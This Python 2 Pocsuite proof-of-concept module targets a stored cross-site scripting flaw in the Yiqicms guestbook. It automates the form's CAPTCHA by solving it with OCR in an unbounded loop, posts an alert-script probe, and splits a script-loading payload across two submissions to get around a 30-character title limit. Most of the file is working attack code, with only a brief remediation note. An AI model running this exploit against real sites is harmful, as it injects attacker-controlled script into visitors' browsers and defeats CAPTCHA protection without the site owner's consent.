#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
import pytesseract
from PIL import Image
import re
class TestPOC(POCBase):
    """Pocsuite PoC for a stored XSS in the Yiqicms guestbook (``comment.php``).

    Per ``desc`` below, the message form only checks the length of user
    input and does not filter script content, so a submitted title is
    stored and later rendered unescaped. ``input_message_and_validate``
    solves the form's image CAPTCHA with OCR (pytesseract over a PIL image)
    so that a submission is accepted; ``_verify`` posts a single probe title
    and ``_attack`` splits a longer payload over two submissions because the
    title field is limited to 30 characters.

    Application-side fix for this class of bug: validate the title / name /
    contact / content fields for more than length and HTML-encode them when
    rendering, rather than storing and echoing raw markup.

    NOTE(review): ``print validate_code`` is a Python 2 print statement and
    the marker strings below are octal byte escapes, so this module parses
    and compares correctly only under Python 2.
    """
    vulID = '89295'  # vul ID
    version = '1'
    author = 'Jim叔叔'
    vulDate = '2014-12-30'
    createDate = '2015-10-03'
    updateDate = '2015-10-03'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-080038']
    name = 'Yiqicms 存储型XSS '
    appPowerLink = 'http://www.yiqicms.com/'
    appName = 'Yiqicms'
    appVersion = '<=1.9'
    vulType = 'XSS'
    # desc is a runtime string shown by pocsuite; its (Chinese) content is left as the author wrote it.
    desc = '''
易企cms存在存储型XSS,网站留言部分只对用户输入进行长度校验,并没有filter掉可能的script输入,导致攻击者可以注入恶意js脚本。
input_message_and_validate函数主要是通过PIL完成验证码图片的分析和提交,能够保证最终提交的表单验证码是正确的。
由于标题输入处要求小于30个字符,为了能够引入第三方恶意脚本,需通过两次注入来完成(exp)。
'''
    # sample sites used when exercising the PoC (none given here)
    samples = ['']

    def input_message_and_validate(self, title):
        """Submit one guestbook message with ``title`` after solving the CAPTCHA.

        Loops until the OCR output matches ``pattern`` (exactly four ASCII
        alphanumerics, spaces stripped) and the server's reply to the POST
        does not contain the "captcha wrong" marker. Returns the raw body of
        the accepted POST response.

        Args:
            title: value sent in the ``msgtitle`` form field.

        NOTE(review): there is no attempt limit and no request timeout, so a
        CAPTCHA the OCR never reads correctly keeps this loop (and its
        repeated fetches of ``/captcha/captcha.php``) running indefinitely.
        NOTE(review): the CAPTCHA image is written to ``1.jpg`` / ``2.jpg`` in
        the current working directory with open/close rather than ``with``,
        so a failure between open and close leaks the handle.
        """
        pattern = '^[a-zA-Z0-9]{4}$'
        regex = re.compile(pattern)
        while 1:
            # a fresh session per attempt; the CAPTCHA is presumably tied to it - confirm against the app
            req_handler = req.Session()
            validate = self.url + '/captcha/captcha.php'
            f = open("1.jpg", "wb")
            pic = req_handler.get(validate).content
            f.write(pic)
            f.close()
            image = Image.open('1.jpg')
            # OCR the image; spaces are dropped so a 4-char code matches the regex
            validate_code = pytesseract.image_to_string(image).replace(' ', '')
            re_result = regex.match(validate_code)
            if re_result:
                # keep a copy of the image whose OCR result looked plausible
                f_save = open("2.jpg", "wb")
                f_save.write(pic)
                f_save.close()
                print validate_code
                payload = {
                    'msgtitle': title,
                    'msgname': '1234',
                    'msgcontact': '1234',
                    'msgcontent': '1234',
                    'capcode': validate_code,
                    'action': 'save'
                }
                target_url = self.url + '/comment.php'
                response = req_handler.post(data=payload, url=target_url)
                content = response.content
                # "captcha wrong," marker (UTF-8 bytes of 验证码错误, as octal escapes)
                if '\351\252\214\350\257\201\347\240\201\351\224\231\350\257\257,' in content:
                    continue
                # captcha accepted
                else:
                    return content

    def _verify(self):
        """Post a single probe title and report success if the app stored it.

        Success is decided by the presence of the "message added
        successfully" marker in the POST response body.
        """
        result = {}
        content = self.input_message_and_validate('<script>alert(1)</script>')
        # "message added successfully" marker (UTF-8 bytes of 留言添加成功, as octal escapes)
        if '\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content:
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = self.url + '/comment.php'
            result['XSSInfo']['Payload'] = '<script>alert(1)</script>'
        return self.parse_result(result)

    def _attack(self):
        """Store the payload in two submissions to fit the 30-character title limit.

        Both POSTs are sent before either response is checked; the result is
        reported only if both bodies contain the success marker.
        """
        # split across two submissions
        result = {}
        content_first = self.input_message_and_validate('*/</script>')
        # the title limit leaves 13 bytes for the src value, so both the host and the
        # script name must be short; "xxxx.js" is the author's placeholder for the script
        content_last = self.input_message_and_validate('<script src="xxxx.js">/*')
        if ('\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content_first) and \
                ('\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content_last):
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = self.url + '/comment.php'
            result['XSSInfo']['Payload'] = '<script src="xxxx.js"></script>'
        return self.parse_result(result)

    def parse_result(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        A non-empty ``result`` dict is reported via ``output.success``;
        an empty one via ``output.fail('failed')``. Returns the ``Output``.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output
# make the PoC class discoverable by the pocsuite framework
register(TestPOC)